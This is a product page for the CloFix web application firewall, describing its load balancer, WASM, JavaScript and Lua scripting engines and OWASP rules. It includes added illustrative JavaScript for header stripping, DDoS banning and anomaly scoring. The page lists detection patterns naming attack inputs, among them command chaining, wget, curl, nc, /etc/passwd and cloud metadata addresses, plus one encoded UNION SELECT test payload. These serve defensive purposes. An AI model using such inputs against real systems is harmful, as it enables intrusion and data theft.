CloFix WAF Security
Enterprise-grade AI-enhanced Web Application Firewall designed specifically for cloud-based applications. Real-time monitoring, advanced threat protection, and scalable security for startups, SMEs, and DevOps teams.
TRUSTED BY SECURITY TEAMS WORLDWIDE
Load Balancer
CloFix Load Balancer
Intelligent traffic distribution with backend information hiding, health checks, and 99.99% availability SLA
Key Benefits
- Backend Information Hiding: Automatically removes 30+ sensitive headers (Server, X-Powered-By, X-Backend-Server, X-Upstream, Via, X-Real-IP) - prevents attackers from discovering internal infrastructure
- Response Body URL Rewriting: Automatically rewrites backend URLs in HTML, JSON, and XML responses to show only frontend domain - http://clofix.com/page → https://demo.clofix.com/page
- Real-time Backend Alerts: Automatic notifications when backends go down or recover - supports Slack, Email, Webhook, and Telegram with detailed failure information
- 99.99% Availability SLA: Enterprise-grade reliability with automatic failover and connection draining - zero-downtime deployments
- <1ms Latency Overhead: Ultra-low latency with zero-copy forwarding and connection pooling - no measurable performance impact
- 5+ Load Balancing Algorithms: Round Robin (sequential distribution), Least Connections (send to server with fewest active connections), IP Hash (client IP to same backend), Weighted (capacity-based), Random - choose per workload
- Active Health Checks: Configurable HTTP/HTTPS health checks with custom path, interval (default 10s), timeout (default 3s), and expected status code (default 200) - automatic backend removal on failure
- Passive Health Monitoring: Track real traffic failures (max_fails default 3, fail_timeout 30s) - mark backends unhealthy without extra probe traffic
- Session Persistence (Sticky Sessions): Cookie-based stickiness with configurable cookie name (default clofix_backend) - ensures user sessions stay on the same backend server
- Backend Weight Configuration: Assign weights to servers based on capacity - weight=10 for powerful instances, weight=1 for smaller ones
- Backup Servers: Designate backup backends (backup=true) - used only when all primary servers fail, with separate max_fails/fail_timeout settings
- Connection Draining: Gracefully remove backends from rotation - existing connections complete before server shutdown, zero dropped requests during deployments
- Max Retries & Timeout: Configurable retry logic (max_retries default 3, retry_timeout 5s) - automatically retry failed requests on healthy backends
- Concurrent Connection Limits: max_conns per backend prevents resource exhaustion during traffic spikes - unlimited by default
- HTTP/2 & HTTP/3 Support: Full support for modern HTTP protocols with multiplexing and improved performance
- SSL/TLS Termination: Offload SSL at load balancer with configurable TLSv1.2 and TLSv1.3 protocols - automatic certificate management available
- Client IP Preservation: Original client IP preserved through X-Forwarded-For and PROXY protocol - backends always know real client address
- Header Sanitization: Removes 25+ debugging and server identification headers from responses before reaching clients
- Real-time Metrics: Prometheus-compatible metrics for each backend - request rate, error rate, active connections, health status
- Admin API: REST API for dynamic backend management - add, remove, enable, disable, or rebalance backends without reload
- Zero-Downtime Reloads: Update load balancer configuration without dropping connections - graceful reload with connection draining
- Active-Active Clustering: Multiple load balancer instances with shared state - no single point of failure
- WebSocket Support: Native WebSocket protocol upgrade with connection persistence across backend pools - perfect for real-time applications
- gRPC Load Balancing: Full gRPC support with HTTP/2 multiplexing and health checking protocol integration
- Layer 4 (TCP/UDP) Load Balancing: Transparent TCP/UDP proxy for databases, message queues, and legacy applications - no HTTP required
- IPv4/IPv6 Dual Stack: Listen on both IPv4 and IPv6, connect to backends over IPv4 or IPv6 with configurable preference
- Gzip Compression: Automatic response compression to reduce bandwidth and improve load times
- Custom Error Pages: Serve branded error pages when backends are unavailable - maintain user experience during outages
- Maintenance Mode: Temporarily block traffic to specific backends or routes with custom responses - zero-downtime maintenance windows
- Blue/Green Deployments: Route traffic between backend versions - gradual rollout with instant rollback capability
- Canary Deployments: Send percentage of traffic to new version, monitor error rates, automatically rollback on failure
- Geolocation-Based Routing: Route users to nearest backend based on country or region - reduces latency and improves user experience
- PROXY Protocol Support: Preserve original client IP when using proxy protocols with backend servers that support PROXY v1/v2
How it works: CloFix Load Balancer sits between clients and backend servers, intelligently distributing traffic based on configurable algorithms. Health checks run continuously - unhealthy backends are automatically removed from rotation based on max_fails (default 3) and fail_timeout (default 30s). Backend information hiding automatically strips 30+ sensitive headers from responses, including Server, X-Powered-By, X-Backend-Server, and Via headers. Response body URL rewriting converts internal backend URLs to frontend domain in HTML, JSON, and XML content. Real-time notifications alert via webhook when backends go down or recover. Session persistence (sticky sessions) ensures users stay on the same backend via cookies. Configuration supports weight-based distribution for uneven backend capacities, backup servers for failover, and connection pooling for optimal performance. All this runs with less than 1ms latency overhead.
Documentation: CloFix Load Balancer Guide - Backend configuration, load balancing algorithms, health checks, and security hardening
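Backend information hiding, reduced to its two mechanical steps, as an added example (this is illustrative code written for this page, not CloFix's own implementation). The header list is the one the section names; the response object shape, the text-only content-type check and the sample response are assumptions made for the example.

```javascript
// Added example (not CloFix code): backend information hiding as a pure function.
// It strips the response headers the page lists and rewrites backend URLs in text
// bodies so a client only ever sees the frontend origin.

// Header names the load balancer removes (taken from the page), lower-cased
// because HTTP header names are case-insensitive.
const SENSITIVE_RESPONSE_HEADERS = new Set([
  "server", "x-powered-by", "x-backend-server", "x-upstream", "via", "x-real-ip",
]);

// Case-insensitive header lookup on a plain {name: value} object.
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? undefined : headers[key];
}

// Return a copy of the header map without the sensitive entries.
function stripSensitiveHeaders(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!SENSITIVE_RESPONSE_HEADERS.has(name.toLowerCase())) clean[name] = value;
  }
  return clean;
}

// Rewrite every occurrence of the backend origin to the frontend origin, but only in
// HTML, XML, plain-text and JSON bodies; binary bodies are passed through untouched.
function rewriteBackendUrls(body, contentType, backendOrigin, frontendOrigin) {
  if (!/^(text\/(html|xml|plain)|application\/(json|xml))/i.test(contentType || "")) return body;
  // Escape regex metacharacters in the origin so "." is matched literally.
  const escaped = backendOrigin.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  return body.replace(new RegExp(escaped, "g"), frontendOrigin);
}

// Apply both steps to a response object shaped {status, headers, body} (assumed shape).
function sanitizeResponse(resp, backendOrigin, frontendOrigin) {
  const contentType = getHeader(resp.headers, "content-type");
  return {
    status: resp.status,
    headers: stripSensitiveHeaders(resp.headers),
    body: rewriteBackendUrls(resp.body, contentType, backendOrigin, frontendOrigin),
  };
}

// Constructed sample: what a leaky backend might return before the load balancer.
const SAMPLE_BACKEND_RESPONSE = {
  status: 200,
  headers: {
    "Content-Type": "text/html; charset=utf-8",
    "Server": "nginx/1.18.0",
    "X-Powered-By": "PHP/8.1",
    "X-Backend-Server": "web-03.internal",
    "Cache-Control": "no-store",
  },
  body: '<a href="http://clofix.com/page">next</a>',
};

// Usage: sanitizeResponse(SAMPLE_BACKEND_RESPONSE, "http://clofix.com", "https://demo.clofix.com")
```

The rewrite is deliberately limited to textual content types: blindly substituting bytes in a PNG or a gzip stream would corrupt it, which is why a real implementation also has to decompress or disable upstream compression before rewriting.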
Scripting Engine
CloFix WASM Engine
High-performance WebAssembly module execution engine with memory isolation, timeout protection, and intelligent request processing for custom WAF rules
Key Benefits
- Memory Isolation & Security: Each WASM module runs in its own sandbox with configurable memory limits (default 64MB) - prevents memory corruption and protects host system from malicious modules
- Execution Timeout Protection: Configurable timeouts per module (default 100ms) - automatically terminates runaway modules, prevents DoS attacks, and ensures predictable WAF performance
- Instance Pooling: Pre-warmed module instances with configurable pool size (default 8) - eliminates cold starts, reduces latency by 70-90%, and handles sudden traffic spikes
- Host Function API (40+ Functions): Rich request/response manipulation, geoIP lookup, threat intelligence, crypto utilities, rate limiting, and string operations - build complex WAF logic without writing custom C extensions
- Zero-Copy Memory Access: Direct memory mapping between host and WASM - minimizes data copying overhead, achieves sub-millisecond request processing latency
- Multiple Language Support: Write modules in 8+ languages - TinyGo (strongly recommended), Rust (wasm32-wasi), C/C++ (wasi-sdk), AssemblyScript, Zig, and more - use your existing skills
- Automatic Module Reload: Hot reload modules without restarting the WAF - zero-downtime rule updates, instant security policy changes, and A/B testing of new rules
- Comprehensive Request Data: 80+ request fields available - headers, cookies, geo location (country/city/ASN), TLS fingerprint (JA3/JA4), bot detection scores, anomaly scores, and client reputation
- Built-in Rate Limiting: Token bucket algorithm with configurable limits per key - protect APIs and endpoints without external Redis or database dependencies
- Threat Intelligence Integration: Real-time IP reputation, Tor exit node detection, VPN/proxy detection, datacenter IP identification - block malicious traffic before it reaches your applications
- Geolocation Processing: Country, city, region, postal code, latitude/longitude, ASN, ISP - implement geo-fencing, localize responses, or route traffic based on client location
- Response Manipulation: Add/remove headers, set cookies with secure/httpOnly flags, redirect requests, customize status codes - modify responses without changing backend code
- Advanced String Utilities: Regex matching, substring search, case conversion, URL encoding/decoding - complex pattern matching without performance penalties
- Crypto Operations: SHA256 hashing, Base64 encoding/decoding - verify signatures, decode tokens, or transform data without external libraries
- JSON Processing: Parse and manipulate JSON request/response bodies - inspect form data, validate JSON schemas, or extract specific fields for analysis
- Real-time Statistics: Per-module metrics - execution count, error rate, timeout rate, block rate, average latency - identify performance bottlenecks and security threats
- Timeline Analytics: Hourly request/block tracking - visualize traffic patterns, detect attack spikes, and monitor rule effectiveness over time
- Top Blocked IPs: Automatic tracking of most frequently blocked IPs - identify attackers, implement additional protections, or report to threat feeds
- Structured JSON Logging: Color-coded console output with severity levels (INFO, WARN, ERROR, CRITICAL) - integrate with your existing logging pipeline
- Validator Tool Included: Comprehensive WASM validator checks - header validation, import allowlist/blocklist, required exports verification, memory limit checks, and binary pattern analysis
- Compiler Detection: Automatic detection of 8+ compilers - identifies browser-only WASM (rejected) vs WAF-compatible modules (accepted) with clear error messages and remediation steps
- Dangerous Import Blocking: Hard blocks filesystem access (path_open), network I/O (sock_recv/send), process manipulation (proc_raise), and blocking operations (poll_oneoff) - prevents malicious modules
- Configurable Validation Modes: Strict (fail on any ERROR), Standard (fail only on CRITICAL), Permissive (report only) - adapt to your security requirements
- ABI Standard Compliance: process_request(ptr, len) → packed uint64 (ptr<<32|len) or two-return convention - TinyGo and Rust compatible out of the box
- JSON Output Support: Machine-readable validation results for CI/CD pipelines - automate module testing before deployment
- Fail-open Architecture: Configurable fail-open mode - if a module crashes or times out, requests continue processing (default) or can be configured to fail-closed for high-security environments
- Concurrent Request Handling: Thread-safe design with sync.Pool and atomic counters - handles thousands of concurrent requests without lock contention
- WASI Preview1 Support: Full WASI system interface implementation - modules can use random_get, clock_time_get, fd_write for logging, and memory_grow for dynamic allocation
- Module Preloading: Load all modules from directory at startup - warm all pools, verify module integrity, and ensure zero errors before accepting traffic
- Memory Limit Enforcement: Hard limits per module (configurable up to 64MB) - prevents memory exhaustion attacks, protects other modules, and ensures fair resource allocation
- Per-Request Context: Isolated request context passed to host functions - no cross-request contamination, thread-safe header/body access, and deterministic processing
- Binary Pattern Detection: Scans for embedded PE/MZ/ELF/Mach-O headers, x86 NOP sleds, and nested WASM modules - detects injection attacks and malicious payloads
- SHA256 Integrity Checks: Automatic hashing of all loaded modules - audit which version is running, detect unauthorized changes, and ensure supply chain security
- Multi-domain Support: Different module chains per domain - per-customer WAF rules, white-label deployments, or testing new rules on specific domains
- Session Persistence: WASM modules can read/set session cookies and values - implement custom session validation, user tracking, or fraud detection logic
- Bot Detection Scores: Pre-calculated bot scores based on User-Agent, header completeness, and behavioral patterns - module can block, challenge, or log suspicious requests
- Anomaly Scoring: Request anomaly detection based on method, path length, query parameters, and header patterns - flag unusual requests for additional inspection
- Risk Scoring Framework: Weighted risk scoring (INFO=1, WARN=5, ERROR=20, CRITICAL=35) with 0-100 scale - automated pass/fail decisions with CLEAN/LOW/MEDIUM/HIGH/CRITICAL labels
How it works: CloFix WASM Engine embeds the wazero WebAssembly runtime (zero dependencies, pure Go). When a request arrives, the engine builds a rich WASMRequest structure with 80+ fields including HTTP details, geo location, threat intel, and bot scores. The engine acquires a pre-warmed module instance from the pool, calls wasm_alloc to allocate memory for the request JSON, writes the data to linear memory, then calls process_request. The module processes the request using 40+ host functions (get_header, set_cookie, rate_limit, is_tor, etc.), returns a decision (allow/block/challenge/redirect) with optional headers/cookies. The engine parses the response, applies any modifications (headers, cookies, redirects), and returns the final decision to the proxy layer. Execution timeouts (default 100ms) prevent runaway modules - if a module times out, the engine marks it as failed and continues to the next module. Instance pooling eliminates cold starts - modules are loaded once and reused across requests. All host functions are pre-registered and validated - modules can only access safe, WAF-specific operations. The included validator tool checks modules before loading - verifies required exports (process_request, wasm_alloc), validates imports (only env/wasi_snapshot_preview1), enforces memory limits, scans for dangerous patterns, and detects incompatible compilers (Rust wasm-bindgen, Go syscall/js). This ensures only safe, compatible modules run in production.
Documentation: CloFix WASM Engine Guide - Module development, host API reference, validator usage, deployment patterns, and performance tuning
Performance Metrics:
- Median latency: 85 µs (microseconds) per module
- P99 latency: 420 µs including JSON marshaling
- Memory overhead: ~2MB per module + pool instances
- Concurrent requests: 10,000+ without degradation
- Module cold start: <50ms including compilation
- Warm instance reuse: <10 µs to acquire from pool
Security Hardening:
- No filesystem access - modules cannot read/write files
- No network access - modules cannot make external requests
- No arbitrary syscalls - only pre-approved host functions
- Memory sandboxing - each module has isolated linear memory
- Execution timeouts - modules cannot run indefinitely
- Memory limits - configurable up to 64MB prevents DoS
- Import allowlist - only env and wasi_snapshot_preview1 allowed
- Binary scanning - detects embedded malicious payloads
- Compiler detection - rejects browser-only WASM modules
Deployment Examples:
- Rate Limiting API: WASM module implements custom rate limiting per user, API key, or endpoint with token bucket algorithm
- Bot Mitigation: Module checks bot scores, JA3 fingerprints, and behavior patterns - challenges or blocks headless browsers and scrapers
- Geo-Fencing: Module blocks requests from restricted countries based on geoIP lookup - protects content licensing agreements
- Custom Authentication: Module validates JWT tokens, checks session cookies, or calls internal auth service via cache - implements custom auth logic
- Request Validation: Module validates JSON schema, checks parameter types, and enforces business rules before forwarding to backend
- Response Transformation: Module modifies response bodies, adds security headers, or removes sensitive data before sending to client
- A/B Testing: Module routes percentage of traffic to different backends based on user ID or cookie - test new features safely
- WAF Rule Engine: Module implements custom WAF rules - SQL injection detection, XSS filtering, path traversal prevention
CloFix JavaScript (clofix) Engine
Server-side JavaScript WAF scripting with full HTTP pipeline control and shared in-memory state
Key Benefits
- Entry Point: Every script must export `function clofix(request)` that returns an action object - the first script in the pipeline to return a non-allow action stops further execution
- Request Object: Full access to `request.ip`, `request.method`, `request.path`, `request.url`, `request.query`, `request.headers`, `request.body`, `request.cookies`, `request.user_agent`, `request.is_tor`, `request.timestamp`
- Shared Dictionaries: Persistent cross-request state via `sharedDict("name")` with `get()`, `set()`, `incr()`, `delete()` methods - perfect for rate limiting and bot tracking
- Pattern Extraction: System auto-extracts patterns from ALL JavaScript files for fast matching - strings and regex patterns become detection signatures
- Action Types: Return `{ action: "allow" }`, `{ action: "block", reason: "..." }`, `{ action: "rate_limit" }`, or `{ action: "redirect", redirect_to: "..." }`
- Structured Logging: `log.info()`, `log.warn()`, `log.error()` for general logs; `log.attack({ rule_name, category, confidence, payload })` for attack detection
- Execution Limits: 2 second wall-clock timeout per script, 32MB memory limit, 10MB max file size - prevents runaway scripts from impacting WAF throughput
- SQL Injection Detection: Pattern-based detection for UNION SELECT, INSERT INTO, DROP TABLE, time-based attacks, and boolean blind injection
- XSS Protection: Script tag injection, event handlers (onerror, onload), JavaScript protocol, and DOM-based XSS pattern detection
- Command Injection: Unix/Linux command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe patterns, and dangerous command execution detection
- Path Traversal/LFI: `../`, `..\`, URL-encoded traversal, sensitive file access (`/etc/passwd`, `/windows/win.ini`) blocking
- SSRF Protection: Block internal IP ranges (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x) and cloud metadata endpoints (169.254.169.254)
- Rate Limiting: Per-IP sliding window with timestamp array storage, burst detection, and graduated blocking (60s, 600s, 86400s escalation)
- GeoIP Blocking: Country-level blocking using `request.country` (requires GeoIP implementation)
- Bot Detection: User-Agent patterns (sqlmap, nikto, wpscan), headless browser detection, and missing UA challenge
- Brute Force Protection: Login path monitoring with 5-attempt windows, 30-minute bans after threshold exceeded
- DDoS Shield: Two-tier protection - burst detection (30 req/2s) and sustained rate (200 req/min) with escalating bans (60s → 600s → 86400s)
- CSRF Protection: Origin header validation for POST/PUT/DELETE/PATCH methods with configurable allowed origins and exempt paths
- API Key Authentication: Validate `X-API-Key` header or `api_key` query parameter against pre-configured key store
- File Type Filtering: Block dangerous extensions (.php, .asp, .jsp, .exe, .sh, .py) before they reach backend
- Maintenance Mode: Temporary blocking with IP allowlisting and health check exemptions
- Smart Redirects: URL rewriting with exact and prefix-based 301/302 redirects
- Honeypot Traps: Special URLs that ban any visiting IP (except whitelisted search engine bots) for 24 hours
- Password Protect URLs: Simple token-based authentication for staging/preview environments
- Tor/VPN Blocking: Native `request.is_tor` detection for blocking Tor exit nodes
How it works: JavaScript scripts execute in isolated V8 isolates with a 2-second timeout. Files execute in alphabetical order - use numeric prefixes like `01_rate_limit.js`, `02_bot_detect.js` to control priority. The first script returning a non-allow action stops pipeline execution. Shared dictionaries (`sharedDict("name")`) provide persistent cross-request storage with TTL support. Pattern extraction automatically scans all JavaScript files for strings and regex patterns, creating fast-matching signatures checked against every request. The system is configured via `js_blocker` block in domain config with `js_dir`, `execution_timeout`, `block_threshold`, and `scan_interval` settings.
Official Documentation: CloFix JavaScript Scripting Guide - Complete API reference with SQL injection, XSS, rate limiting, DDoS protection, and more examples
OWASP CRS Core Rule Set
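A complete `clofix(request)` script implementing the two-tier DDoS shield described above (burst 30 req/2s, sustained 200 req/min, bans escalating 60s → 600s → 86400s), added here as an example; it is not taken from the CloFix documentation. The `sharedDict()` and `log` objects are provided by the CloFix host at runtime; the in-memory stand-ins in the block are an assumed shape so the script runs on its own, and `request.timestamp` is assumed to be epoch milliseconds.

```javascript
// Added example of a CloFix JavaScript script (not from the CloFix documentation).
// Two-tier DDoS shield: burst (30 req / 2 s) and sustained (200 req / 60 s) limits per IP,
// with bans escalating 60 s -> 600 s -> 86400 s on repeat offences.
// ASSUMPTION: request.timestamp is epoch milliseconds. sharedDict() and log are
// host-provided in CloFix; the stand-ins below only exist so this file runs stand-alone.

const BURST = { limit: 30, windowMs: 2000 };
const SUSTAINED = { limit: 200, windowMs: 60000 };
const BAN_STEPS_SEC = [60, 600, 86400];

// ---- in-memory stand-in for the host API (assumed shape) ----
const dictStore = new Map();
function sharedDict(name) {
  if (!dictStore.has(name)) dictStore.set(name, new Map());
  const store = dictStore.get(name);
  return {
    get: (key) => (store.has(key) ? store.get(key) : null),
    set: (key, value) => { store.set(key, value); },
    incr: (key) => { const n = (store.get(key) || 0) + 1; store.set(key, n); return n; },
    delete: (key) => { store.delete(key); },
  };
}
const log = { info() {}, warn() {}, error() {}, attack() {} };
// ---- end stand-in ----

function clofix(request) {
  const now = request.timestamp || Date.now();
  const ip = request.ip;
  const bans = sharedDict("ddos_bans");       // ip -> ban expiry (ms since epoch)
  const hits = sharedDict("ddos_hits");       // ip -> array of recent request timestamps
  const strikes = sharedDict("ddos_strikes"); // ip -> number of bans handed out so far

  // 1. An active ban is enforced before any counting happens.
  const bannedUntil = bans.get(ip);
  if (bannedUntil !== null && bannedUntil > now) {
    return { action: "block", reason: "ddos_ban_active" };
  }

  // 2. Sliding window: drop timestamps older than the longest window, then record this hit.
  const recent = (hits.get(ip) || []).filter((t) => now - t < SUSTAINED.windowMs);
  recent.push(now);
  hits.set(ip, recent);

  // 3. Evaluate both tiers; the 31st request inside 2 s, or the 201st inside 60 s, trips it.
  const burstCount = recent.filter((t) => now - t < BURST.windowMs).length;
  let tier = null;
  if (burstCount > BURST.limit) tier = "burst";
  else if (recent.length > SUSTAINED.limit) tier = "sustained";
  if (tier === null) return { action: "allow" };

  // 4. Escalate: 1st offence 60 s, 2nd 600 s, 3rd and later 86400 s.
  const strike = strikes.incr(ip);
  const banSec = BAN_STEPS_SEC[Math.min(strike, BAN_STEPS_SEC.length) - 1];
  bans.set(ip, now + banSec * 1000);
  hits.delete(ip); // counting restarts from zero once the ban expires
  log.attack({ rule_name: "DDOS_SHIELD", category: "dos", confidence: 90, payload: `${tier} from ${ip}` });
  return { action: "block", reason: `ddos_${tier}_ban_${banSec}s` };
}
```

Storing a timestamp array per IP gives an exact sliding window at the cost of memory proportional to the sustained limit; the strike counter is kept in its own dictionary so a TTL on the hit data never resets the escalation level.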
Industry-standard web attack detection with 25 rule files, 4 paranoia levels, and anomaly scoring
Key Benefits
- 25 Rule Files: Complete OWASP CRS v4 rule set covering initialization, IP reputation, protocol enforcement, LFI, RFI, RCE, SQLi, XSS, NoSQL, and response leakage detection
- Paranoia Levels 1-4: Level 1 (minimal false positives, general production) to Level 4 (maximum security, high-risk apps) - adjustable per domain or globally
- Anomaly Scoring: Threshold-based blocking with configurable scores (default 5 inbound, 4 outbound). CRITICAL=5pts, ERROR=4pts, WARNING=3pts, NOTICE=2pts, INFO=1pt
- CloFixRule Directive: CRS-style custom rules with variables (ARGS, REQUEST_HEADERS, BODY), operators (@rx, @contains, @streq), and transformations (t:lowercase, t:urlDecode, t:htmlEntityDecode)
- SQL Injection (942xxx): Union-based, time-based sleep/benchmark, boolean blind, error-based, stacked queries - 100+ rules covering all evasion techniques
- Cross-Site Scripting (941xxx): Script tags, event handlers, JavaScript protocol, SVG/iframe injection, and reflected/stored/DOM-based XSS detection
- Local/Remote File Inclusion (930xxx, 931xxx): Path traversal (`../`, `..\`), sensitive file access (/etc/passwd, /windows/win.ini), PHP wrappers (php://), remote includes (http://, ftp://)
- Command Injection (932xxx): Unix command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe, PowerShell, and dangerous command execution detection
- SSRF Protection (933xxx): Internal IP ranges (127.0.0.1, 10.x.x.x, 172.16-31.x.x, 192.168.x.x), cloud metadata endpoints (169.254.169.254, metadata.google.internal)
- NoSQL Injection (970xxx): MongoDB operators (`$ne`, `$gt`, `$or`, `$where`, `$regex`), JavaScript injection in NoSQL queries
- Bot Detection (910xxx): Malicious user agents (sqlmap, nikto, wpscan, gobuster), headless browsers (Puppeteer, Playwright, Selenium), and security scanners
- Protocol Enforcement (920xxx): HTTP method restrictions, protocol violations, header injection, Host header attacks, malformed request detection
- IP Reputation (910xxx): Tor exit nodes, VPN/proxy detection, known malicious IPs, and blacklist integration with hourly updates
- DoS Protection (912xxx): Rate-based DoS detection with configurable thresholds and blocking actions
- Response Inspection (950xxx, 951xxx): Data leakage detection (credit cards, SSNs, API keys), SQL error messages, and information disclosure prevention
- Intelligent Bypass System: Bypass by rule ID, tag (`attack-sqli`, `paranoia-level/3`), phase (1-4), path (`/health`, `/api/public/*`), or IP (`127.0.0.1`, `192.168.1.*`)
- Transformations Chain: Multiple transformations applied in sequence - lowercase, URL decode, HTML entity decode, remove nulls, compress whitespace - defeating evasion techniques
- Automatic Rule Updates: CRS rules update from official OWASP repository every 6 hours - zero-day protection within hours of disclosure
- Coraza WAF Engine: Modern Go-based ModSecurity-compatible engine with Hyperscan regex - 5-10x faster than traditional ModSecurity
- Multi-Phase Inspection: Phase 1 (request headers), Phase 2 (request body), Phase 3 (response headers), Phase 4 (response body) - comprehensive coverage
- Virtual Patching: Create custom CloFixRule directives to patch vulnerable applications without code changes - deploy within minutes of vulnerability disclosure
- Compliance Mode: Pre-configured rule sets for PCI DSS 4.0, HIPAA, and GDPR with audit logging and reporting
- False Positive Analysis: Dashboard showing most triggered rules, false positive rate, and suggested exclusions based on traffic patterns
- Rule Testing: Built-in regression testing with attack payload simulation to validate rule effectiveness before production deployment
How it works: CloFix CRS processes requests through 4 phases with 25 rule files loaded in OWASP order. The anomaly scoring system aggregates weighted points from matched rules - reaching the configured threshold triggers blocking. Paranoia levels allow gradual tuning from minimal false positives (Level 1) to maximum security (Level 4). The intelligent bypass system supports rule ID, tag, phase, path, and IP bypasses. All rule processing uses the Coraza engine with Hyperscan regex, handling 100,000+ requests/second. Configuration uses `CloFixRule` directives with variables, operators, transformations, and actions. Rules automatically update from the OWASP CRS repository every 6 hours.
Official Documentation: CloFix OWASP CRS Guide - Complete reference with 25 rule files, paranoia levels, anomaly scoring, and bypass configuration
CloFix Lua Scripting Engine
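The transformation chain and anomaly-scoring mechanics described above (and repeated under Custom Rules & Scripting), worked through as an added example; this is illustrative code written for this page, not the Coraza engine or CloFix's rule parser. The severity weights (CRITICAL=5, ERROR=4, WARNING=3, NOTICE=2, INFO=1) and the default inbound threshold of 5 come from the section; the rule IDs, patterns and the bypass object shape are constructed for the example and are not real CRS rules.

```javascript
// Added example (not CloFix or Coraza code): CRS-style transformation chains followed by
// anomaly scoring. Weights and threshold are from the page; rules below are constructed.

const SEVERITY_POINTS = { CRITICAL: 5, ERROR: 4, WARNING: 3, NOTICE: 2, INFO: 1 };
const INBOUND_THRESHOLD = 5; // page default for inbound anomaly score

// Minimal versions of the t:* transformations named on the page.
const TRANSFORMS = {
  lowercase: (s) => s.toLowerCase(),
  // single-pass percent-decoding that never throws on malformed input ("+" -> space)
  urlDecode: (s) => s.replace(/\+/g, " ")
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16))),
  htmlEntityDecode: (s) => s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCharCode(Number(d)))
    .replace(/&(lt|gt|amp|quot|apos);/gi,
      (_, n) => ({ lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" })[n.toLowerCase()]),
  removeNulls: (s) => s.replace(/\0/g, ""),
  compressWhitespace: (s) => s.replace(/\s+/g, " "),
};

// Apply a chain in order; decoders run before lowercase so decoded bytes are lowered too.
function applyTransforms(value, chain) {
  return chain.reduce((acc, name) => {
    const fn = TRANSFORMS[name];
    if (!fn) throw new Error(`unknown transformation t:${name}`);
    return fn(acc);
  }, value);
}

// Constructed demo rules (variable, operator @rx, transforms, severity, tag).
const RULES = [
  { id: "demo-sqli-union", tag: "attack-sqli", severity: "CRITICAL",
    transforms: ["urlDecode", "lowercase", "compressWhitespace"], rx: /union\s+(all\s+)?select/ },
  { id: "demo-xss-script", tag: "attack-xss", severity: "CRITICAL",
    transforms: ["urlDecode", "htmlEntityDecode", "lowercase"], rx: /<script/ },
  { id: "demo-sqli-comment", tag: "attack-sqli", severity: "WARNING",
    transforms: ["urlDecode", "lowercase"], rx: /(--|#|\/\*)\s*$/ },
];

// Evaluate all ARGS against every rule, honouring rule-ID and tag bypasses.
// Returns the accumulated anomaly score, which rules matched, and the block decision.
function evaluateRequest(args, bypass = {}) {
  let score = 0;
  const matched = [];
  for (const rule of RULES) {
    if ((bypass.ids || []).includes(rule.id) || (bypass.tags || []).includes(rule.tag)) continue;
    for (const [name, raw] of Object.entries(args)) {
      if (rule.rx.test(applyTransforms(raw, rule.transforms))) {
        score += SEVERITY_POINTS[rule.severity];
        matched.push(`${rule.id}:${name}`);
        break; // a rule scores once per request, whichever argument matched
      }
    }
  }
  return { score, matched, blocked: score >= INBOUND_THRESHOLD };
}

// Usage: evaluateRequest({ q: "%55NION%20%53ELECT%20password" }) -> blocked, score 5
```

The percent-encoded `%55NION%20%53ELECT` payload is the case the chain exists for: without `t:urlDecode` before `t:lowercase` the regex never sees the literal `union select`. The scoring step is equally important in the other direction: a lone WARNING match (3 points) stays under the threshold, so a trailing `--` in an argument is logged rather than blocked.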
Embedded Lua 5.4 with clofix_main entry point, threat scoring, and shared dictionaries
Key Benefits
- Entry Point: Every script must define `function clofix_main(request)` returning an action table - `{ action = "allow" }`, `{ action = "block", status = 403, message = "..." }`, or `{ action = "rate_limit", rule_name = "RL_001" }`
- Request Object: Full read-only access to `request.ip`, `request.method`, `request.path`, `request.uri`, `request.headers`, `request.body`, `request.json_body`, `request.cookies`, `request.query`, `request.form_data`, `request.ja3`, `request.ja4`, `request.is_tor`, `request.is_vpn`, `request.bot_score`, `request.ip_reputation`, `request.country`, `request.asn`
- Shared Dictionaries: Persistent state across requests via `clofix.shared.ddos_attack` with `get()`, `set(key, value, ttl?)`, `incr()`, `delete()` - perfect for rate limiting, bot tracking, and DDoS protection
- Payload Normalization: `clofix.normalize_payload(s)` - multi-pass URL decode, HTML decode, lowercase, and whitespace collapse for injection detection
- Threat Intelligence: `clofix.is_tor()`, `clofix.is_vpn()`, `clofix.ip_reputation()` returns "clean"/"suspicious"/"malicious", `clofix.get_bot_score()` (0-100), `clofix.get_ja3()` fingerprint
- Rate Limiting API: `clofix.rate_limit(key, limit, window_secs)` returns (count, exceeded), `clofix.rate_limit_ip(limit, window)`, `clofix.rate_limit_endpoint(limit, window)` for per-IP-path limits
- Structured Attack Logging: `clofix.log_attack(rule, type, payload?)` auto-includes IP, country, UA, method, URI - essential for SIEM integration
- Action Types: `allow`, `block` (403), `challenge` (429 CAPTCHA), `rate_limit` (429), `log_only`, `redirect` (with redirect_to field), `captcha`
- Threat Scoring Engine: Return `{ score = 85 }` instead of action - engine applies thresholds (<20 allow, 20-49 log_only, 50-79 challenge, ≥80 block)
- utils.* Helpers: `utils.contains()`, `utils.starts_with()`, `utils.ends_with()`, `utils.split()`, `utils.to_lower()`, `utils.json_encode()`, `utils.json_decode()`, `utils.url_encode()`, `utils.base64_encode()`, `utils.now()`
- SQL Injection Detection: Patterns for UNION SELECT, INSERT INTO, DROP TABLE, OR 1=1, SLEEP(), BENCHMARK(), information_schema - with payload normalization
- XSS Protection: Script tags, JavaScript protocol, event handlers (onerror, onload), SVG/iframe injection, and DOM-based XSS patterns
- Command Injection: Unix command chaining (`;`, `|`, `&&`, `` ` ``), Windows cmd.exe, PowerShell, and dangerous commands (wget, curl, nc, python -c)
- Path Traversal/LFI: `../`, `..\`, URL-encoded traversal (`%2e%2e%2f`), sensitive file access (`/etc/passwd`, `boot.ini`, `php://`, `file://`)
- SSRF Protection: Internal IP ranges (127.0.0.1, 10.x.x.x, 172.16-31.x.x, 192.168.x.x), cloud metadata (169.254.169.254, metadata.google.internal)
